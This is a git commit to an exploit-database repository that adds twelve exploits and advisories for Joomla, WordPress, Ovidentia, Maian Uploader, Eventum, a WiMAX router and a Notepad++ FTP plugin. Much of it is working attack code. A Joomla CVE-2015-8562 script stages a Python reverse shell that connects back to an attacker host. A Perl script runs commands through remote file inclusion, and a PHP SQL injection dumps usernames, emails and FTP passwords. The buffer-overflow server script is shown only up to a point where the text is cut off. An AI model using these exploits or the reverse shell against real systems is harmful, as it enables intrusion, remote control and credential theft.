From 216678b9be19f62c4b807513fa302146e0b8d732 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 22 Dec 2015 05:03:05 +0000 Subject: [PATCH] DB: 2015-12-22 12 new exploits --- files.csv | 10 ++ platforms/cgi/dos/39073.txt | 8 + platforms/cgi/remote/39074.txt | 9 ++ platforms/php/webapps/38977.py | 44 ++++++ platforms/php/webapps/39033.py | 131 +++++++++++++++++ platforms/php/webapps/39063.txt | 18 +++ platforms/php/webapps/39064.txt | 59 ++++++++ platforms/php/webapps/39065.txt | 11 ++ platforms/php/webapps/39066.txt | 11 ++ platforms/php/webapps/39068.txt | 25 ++++ platforms/php/webapps/39069.pl | 72 +++++++++ platforms/windows/dos/39067.py | 249 ++++++++++++++++++++++++++++++++ platforms/windows/dos/39070.txt | 52 +++++++ 13 files changed, 699 insertions(+) create mode 100755 platforms/cgi/dos/39073.txt create mode 100755 platforms/cgi/remote/39074.txt create mode 100755 platforms/php/webapps/38977.py create mode 100755 platforms/php/webapps/39033.py create mode 100755 platforms/php/webapps/39063.txt create mode 100755 platforms/php/webapps/39064.txt create mode 100755 platforms/php/webapps/39065.txt create mode 100755 platforms/php/webapps/39066.txt create mode 100755 platforms/php/webapps/39068.txt create mode 100755 platforms/php/webapps/39069.pl create mode 100755 platforms/windows/dos/39067.py create mode 100755 platforms/windows/dos/39070.txt diff --git a/files.csv b/files.csv index f8a769c52..ea8dc5e3c 100755 --- a/files.csv +++ b/files.csv @@ -35317,3 +35317,13 @@ id,file,description,date,author,platform,type,port 39060,platforms/php/webapps/39060.txt,"XOS Shop 'goto' Parameter SQL Injection Vulnerability",2014-01-24,JoKeR_StEx,php,webapps,0 39061,platforms/android/local/39061.txt,"GoToMeeting for Android Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",android,local,0 39062,platforms/php/webapps/39062.txt,"ZenPhoto SQL Injection",2014-01-24,KedAns-Dz,php,webapps,0 +39063,platforms/php/webapps/39063.txt,"WordPress WP e-Commerce Plugin Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 +39064,platforms/php/webapps/39064.txt,"Maian Uploader 4.0 Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 +39065,platforms/php/webapps/39065.txt,"Eventum Insecure File Permissions Vulnerability",2014-01-27,"High-Tech Bridge",php,webapps,0 +39066,platforms/php/webapps/39066.txt,"Eventum 'hostname' Parameter Remote Code Execution Vulnerability",2014-01-28,"High-Tech Bridge",php,webapps,0 +39067,platforms/windows/dos/39067.py,"Notepad++ NPPFtp Plugin 0.26.3 - Buffer Overflow",2015-12-21,R-73eN,windows,dos,0 +39068,platforms/php/webapps/39068.txt,"Ovidentia online Module 2.8 - GLOBALS[babAddonPhpPath] Remote File Inclusion",2015-12-21,bd0rk,php,webapps,0 +39069,platforms/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution Exploit",2015-12-21,bd0rk,php,webapps,80 +39070,platforms/windows/dos/39070.txt,"Base64 Decoder 1.1.2 - SEH OverWrite PoC",2015-12-21,Un_N0n,windows,dos,0 +39073,platforms/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/reboot.cgi Unauthenticated Remote Reboot DoS",2014-02-03,"Josue Rojas",cgi,dos,0 +39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0 diff --git a/platforms/cgi/dos/39073.txt b/platforms/cgi/dos/39073.txt new file mode 100755 index 000000000..ef6e16d22 --- /dev/null +++ b/platforms/cgi/dos/39073.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/65306/info + +WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability. + +Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device. + +http://www.example.com/cgi-bin/reboot.cgi?select_option_value=factory_default&reboot_option=on&action=Apply +http://www.example.com/cgi-bin/reboot.cgi?select_option_value=default_reboot&reboot_option=on&action=Apply diff --git a/platforms/cgi/remote/39074.txt b/platforms/cgi/remote/39074.txt new file mode 100755 index 000000000..6643e8139 --- /dev/null +++ b/platforms/cgi/remote/39074.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/65306/info + +WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability. + +Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device. + +curl -v --data "select_mode_ping=on&ping_ipaddr=127.0.0.1>/dev/null; ls +-lash /etc%23&ping_count=1&action=Apply&html_view=ping" +"http://www.example.com/cgi-bin/diagnostic.cgi" > /dev/null \ No newline at end of file diff --git a/platforms/php/webapps/38977.py b/platforms/php/webapps/38977.py new file mode 100755 index 000000000..ed3c04082 --- /dev/null +++ b/platforms/php/webapps/38977.py @@ -0,0 +1,44 @@ +''' + Simple PoC for Joomla Object Injection. + Gary @ Sec-1 ltd + http://www.sec-1.com/ +''' + +import requests # easy_install requests + +def get_url(url, user_agent): + + headers = { + 'User-Agent': user_agent + } + cookies = requests.get(url,headers=headers).cookies + for _ in range(3): + response = requests.get(url, headers=headers,cookies=cookies) + return response + +def php_str_noquotes(data): + "Convert string to chr(xx).chr(xx) for use in php" + encoded = "" + for char in data: + encoded += "chr({0}).".format(ord(char)) + + return encoded[:-1] + + +def generate_payload(php_payload): + + php_payload = "eval({0})".format(php_str_noquotes(php_payload)) + + terminate = '\xf0\xfd\xfd\xfd'; + exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' + injected_payload = "{};JFactory::getConfig();exit".format(php_payload) + exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) + exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate + + return exploit_template + + + +pl = generate_payload("system('touch /tmp/fx');") + +print get_url("http://172.31.6.242/", pl) \ No newline at end of file diff --git a/platforms/php/webapps/39033.py b/platforms/php/webapps/39033.py new file mode 100755 index 000000000..d208330b3 --- /dev/null +++ b/platforms/php/webapps/39033.py @@ -0,0 +1,131 @@ +#!/usr/bin/env python + +# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header +# Date: 12/17/2015 +# Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs) +# Vendor Homepage: https://www.joomla.org/ +# Software Link: http://joomlacode.org/gf/project/joomla/frs/ +# Version: Joomla 1.5 - 3.4.5 +# Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable) +# CVE : CVE-2015-8562 + + +''' + Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562 + PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE + + Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com): + https://www.exploit-db.com/exploits/38977/ + + Vulnerability Info, Exploit, Detection: + https://breakpoint-labs.com/joomla-rce-cve-2015-8562/ + + Exploit modified to use "X-Forwarded-For" header instead of "User-Agent" to avoid default logged to access.log + + Usage - Automate Blind RCE: + python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd + $ touch /tmp/newhnewh + + Usage - Spawn Reverse Shell using Pentestmonkey's Python one-liner and netcat listener on local host: + python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444 + [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://192.168.1.139/ + [-] Uploading python reverse shell with LHOST:192.168.1.119 and LPORT:4444 + + [+] Spawning reverse shell.... + + + Listening on [0.0.0.0] (family 0, port 4444) + $ python -c "import pty;pty.spawn('/bin/bash')" + www-data@ubuntu:/$ id + uid=33(www-data) gid=33(www-data) groups=33(www-data) + www-data@ubuntu:/$ + +''' + +import requests +import subprocess +import argparse +import sys +import base64 + +# Heavy lifting from PoC author Gary@ Sec-1 ltd (http://www.sec-1.com) +def get_url(url, user_agent): + + headers = { + 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests + 'x-forwarded-for': user_agent # X-Forwarded-For header instead of UA + } + cookies = requests.get(url,headers=headers).cookies + for _ in range(3): + response = requests.get(url, headers=headers,cookies=cookies) + return response + + +def php_str_noquotes(data): + "Convert string to chr(xx).chr(xx) for use in php" + encoded = "" + for char in data: + encoded += "chr({0}).".format(ord(char)) + + return encoded[:-1] + + +def generate_payload(php_payload): + + php_payload = "eval({0})".format(php_str_noquotes(php_payload)) + + terminate = '\xf0\xfd\xfd\xfd'; + exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' + injected_payload = "{};JFactory::getConfig();exit".format(php_payload) + exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) + exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate + + return exploit_template + + +def main(): + parser = argparse.ArgumentParser(prog='cve-2015-8562.py', description='Automate blind RCE for Joomla vuln CVE-2015-8652') + parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Joomla Server') + parser.add_argument('-l', dest='LHOST', help='specifiy local ip for reverse shell') + parser.add_argument('-p', dest='LPORT', help='specifiy local port for reverse shell') + parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE') + + args = parser.parse_args() + + if args.cmd: + print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST) + print "[-] Dropping into shell-like environment to perform blind RCE" + while True: + command = raw_input('$ ') + cmd_str = "system('{}');".format(command) + pl = generate_payload(cmd_str) + print get_url(args.RHOST, pl) + + # Spawn Reverse Shell using Netcat listener + Python shell on victim + elif args.LPORT and args.LPORT: + connection = "'{}', {}".format(args.LHOST, args.LPORT) + + # pentestmonkey's Python reverse shell one-liner: + shell_str = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('''+connection+'''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''' + # Base64 encoded the Python reverse shell as some chars were messing up in the exploit + encoded_comm = base64.b64encode(shell_str) + # Stage 1 payload Str + payload = "echo {} | base64 -d > /tmp/newhnewh.py".format(encoded_comm) + print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST) + print "[-] Uploading python reverse shell with LHOST {} and {}".format(args.LHOST, args.LPORT) + # Stage 1: Uploads the Python reverse shell to "/tmp/newhnewh.py" + pl = generate_payload("system('"+payload+"');") + print get_url(args.RHOST, pl) + # Spawns Shell listener using netcat on LHOST + listener = subprocess.Popen(args=["gnome-terminal", "--command=nc -lvp "+args.LPORT]) + print "[+] Spawning reverse shell...." + # Stage 2: Executes Python reverse shell back to LHOST:LPORT + pl = generate_payload("system('python /tmp/newhnewh.py');") + print get_url(args.RHOST, pl) + else: + print '[!] missing arguments' + parser.print_help() + + +if __name__ == "__main__": + main() diff --git a/platforms/php/webapps/39063.txt b/platforms/php/webapps/39063.txt new file mode 100755 index 000000000..69c710c3c --- /dev/null +++ b/platforms/php/webapps/39063.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/65130/info + +The WP e-Commerce plugin for WordPress is prone to multiple security vulnerabilities, including: + +1. Multiple remote code-execution vulnerabilities. +2. A local file-include vulnerability +3. An arbitrary file-upload vulnerability + +An attacker can exploit these issues to execute arbitrary code, include arbitrary local files, upload arbitrary files to the affected computer that may result in arbitrary code execution within the context of the vulnerable application. + +WP e-Commerce 3.8.9.5 is vulnerable; other versions may also be affected. + +Local file-include +http://www.example.com/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=[LFI] + +Remote code-execution +http://www.example.com/wp-e-commerce/wpsc-admin/ajax.php?wpsc_action=[CMD] +http://www.example.com/wp-e-commerce/wpsc-admin/display-sales-logs.php?c=[CMD] \ No newline at end of file diff --git a/platforms/php/webapps/39064.txt b/platforms/php/webapps/39064.txt new file mode 100755 index 000000000..45044bea8 --- /dev/null +++ b/platforms/php/webapps/39064.txt @@ -0,0 +1,59 @@ +source: http://www.securityfocus.com/bid/65137/info + +Maian Uploader is prone to multiple security vulnerabilities, including: + +1. An SQL-injection vulnerability +2. Multiple cross-site scripting vulnerabilities + +Attackers can exploit these issues to access or modify data, exploit latent vulnerabilities in the underlying database, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Maian Uploader 4.0 is vulnerable; other versions may also be affected. + ++] Exploit (1) ' SQL Injection ' => +# +# 92 ) +# $q_acc = mysql_query("SELECT id,username FROM ".$database['prefix']."members +# WHERE id != '".$_POST['id']."' +# ORDER BY accname") or die(mysql_error()); +# +# */ +# +# $sqli = "SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,ftp_user,0x3a,ftp_pass SEPARATOR 0x2c20) FROM mu_members"; +# +# $ch = curl_init(); +# curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); +# curl_setopt($ch, CURLOPT_URL, "http://[target]/[path]/admin/data_files/move.php"); +# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); +# curl_setopt($ch, CURLOPT_POST, 1); +# curl_setopt($ch, CURLOPT_POSTFIELDS, "id=$sqli"); +# $exploit = curl_exec ($ch); +# curl_close($ch); +# unset($ch); +# echo $exploit; +# ?> +# +#### +# +# [+] Exploit (2) ' XSRF/XSS ' => +# +# - load_flv.js.php ( line : 25 ) +# document.write('

XsS by KedAns-Dz

+# XSS : "> +# +# http://127.0.0.1/uploader/admin/js/load_flv.js.php?width=[ XSS ] +# http://127.0.0.1/uploader/js/load_flv.js.php?width=[ XSS ] +# +# [&] Exploit (3) ' Full Path Disclosure ' => +# +# don't put ( &height= ) after width Xss and you get error +# Notice about ( Undefined index: height ) with the Full Path Dir. +# +###################################################################### diff --git a/platforms/php/webapps/39065.txt b/platforms/php/webapps/39065.txt new file mode 100755 index 000000000..711820dc8 --- /dev/null +++ b/platforms/php/webapps/39065.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/65186/info + +Eventum is prone to an insecure file-permission vulnerability. + +An attacker can exploit this issue to reinstall vulnerable application. This may aid in further attacks. + +Eventum 2.3.4 is vulnerable; other versions may also be affected. + +Following example URI is available. + +http://www.example.com/setup/index.php \ No newline at end of file diff --git a/platforms/php/webapps/39066.txt b/platforms/php/webapps/39066.txt new file mode 100755 index 000000000..dda6bf871 --- /dev/null +++ b/platforms/php/webapps/39066.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/65196/info + +Eventum is prone to remote code execution vulnerability. + +Successfully exploiting this issue allows attackers to execute arbitrary PHP code in the context of the affected application. + +Eventum prior to 2.3.4 are vulnerable. + +Following example URL is available. + +http://www.example.com/index.php?cmd=phpinfo%28%29; \ No newline at end of file diff --git a/platforms/php/webapps/39068.txt b/platforms/php/webapps/39068.txt new file mode 100755 index 000000000..75e0170d1 --- /dev/null +++ b/platforms/php/webapps/39068.txt @@ -0,0 +1,25 @@ +# Title: Ovidentia Module online 2.8 GLOBALS[babAddonPhpPath] Remote File Include Vulnerability +# Author: bd0rk +# eMail: bd0rk[at]hackermail.com +# Twitter: twitter.com/bd0rk +# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fonline&file=online-2-8.zip&idf=832 + +PoC: +/online-2-8/programs/admin.php line 2 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +require_once( $GLOBALS['babAddonPhpPath']."functions.php"); +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +[+]Exploit: http://[target]/online-2-8/programs/admin.php?GLOBALS[babAddonPhpPath]=EVIL_SHELLCODE? + +Description: The $GLOBALS['babAddonPhpPath']-parameter isn't declared before qequire_once. + So it's possible to compromise the web-server about it. + An attacker can inject s0me php-shellcode. + I think, it's a big problem in this web-software! + +Patch: You can declare the vulnerable parameter or use an alert. + + +~~Greetz: x0r_32, m0rphin, GoLd_M, zone-h.org-Team~~ + + diff --git a/platforms/php/webapps/39069.pl b/platforms/php/webapps/39069.pl new file mode 100755 index 000000000..aca09d00c --- /dev/null +++ b/platforms/php/webapps/39069.pl @@ -0,0 +1,72 @@ +# Title: Ovidentia Widgets 1.0.61 Remote Command Execution Exploit +# Author: bd0rk +# eMail: bd0rk[at]hackermail.com +# Twitter: twitter.com/bd0rk +# Tested on: Ubuntu-Linux +# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FLibrairies+partagees%2FWidgets&file=widgets-1-0-61.zip&idf=870 +# The $GLOBALS['babInstallPath']-parameter in /programs/groups.php line 24 is vulnerable for it. +# Use some shellcode / c99 for example. +---------------- +~~Exploitcode~~ +---------------- + +use LWP::UserAgent; +use HTTP::Request; +use LWP::Simple; +use Getopt::Long; + +sub clear{ +system(($^O eq 'MSWin32') ? 'cls' : 'clear'); +} + +&clear(); + +sub bd0rk { +print "Ovidentia Widgets 1.0.61 Remote Command Execution Exploit\n"; +print "Sploit:\n"; +print "$0 -v \"http://[target]/path/programs/\" -shellcode \"http://[target]/shell.txt?\"\n\n"; +exit(); +} + +my $a = GetOptions ( +'v=s' => \$v, +'shellcode=s' => \$shellcode +); + +&bd0rk unless ($v); +&bd0rk unless ($shellcode); + +&bd0rk if $bd0rk eq 1; + +chomp($v); +chomp($shellcode); + +while (){ + +print "[shellcode]:~\$ "; +chomp($cmd=); + +if ($cmd eq "exit" || $cmd eq "quit") { +exit 0; +} +my $agent = LWP::UserAgent->new; +$in="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1"; +chomp($in); +my $a = $v ."/widgets-1-0-61/programs/groups.php?GLOBALS[babInstallPath]=" . $shellcode . $in; +chomp $a; +my $request = HTTP::Request->new(Get => $a); +my $resource = $agent->request($request); +my $content = $resource->content; +if ($resource->is_success){ +print $1,"\n" if ($content =~ m/readonly> (.*?)\<\/textarea>/mosix); +} + +else +{ +print "EXPLOIT FAILURE\n"; +exit(1); +} +} + + + diff --git a/platforms/windows/dos/39067.py b/platforms/windows/dos/39067.py new file mode 100755 index 000000000..2e51342f2 --- /dev/null +++ b/platforms/windows/dos/39067.py @@ -0,0 +1,249 @@ +# Title : Notepad ++ NPPFtp Plugin Buffer Overflow +# Date : 19/12/2015 +# Author : R-73eN +# Tested on : NPPFtp 0.26.3 (Latest Version) +# Software : http://sourceforge.net/projects/nppftp/ +# Vendor : https://notepad-plus-plus.org/ +# ___ __ ____ _ _ +# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | +# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | +# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ +# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____| +# +# A buffer overflow exists in the NPPftp plugin. When the plugin is connected to a malicious server +# which server a crafted LIST response causes the application to crash. +# +# How to reproduce +# +# 1. Start this python server +# 2. Open Notepad ++ , go to plugins , NPPFtp, Show windows +# 3. Click on the gear button to create a new connection. +# 4. Create the connection to connect to the server. +# 5. Connect and the application will crash. + +import os,socket,threading,time +allow_delete = False +local_ip = "192.168.1.121"#socket.gethostbyname(socket.gethostname()) +local_port = 21 +currdir=os.path.abspath('.') + +buff = "rwxrwxrwx 1 1 00" + "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es